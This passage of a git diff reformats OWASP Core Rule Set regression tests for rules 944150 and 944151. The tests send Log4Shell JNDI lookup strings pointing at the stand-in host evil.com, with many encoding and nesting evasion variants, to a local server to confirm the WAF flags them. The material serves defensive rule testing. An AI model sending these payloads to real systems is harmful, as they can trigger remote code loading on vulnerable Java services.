dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 71a8e02..f056fae 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -1,456 +1,454 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944152.yaml. +# 944151 should detect the same things as 944150 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944151.yaml" - description: "Description" +rule_id: 944151 tests: - - test_title: 944151-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP 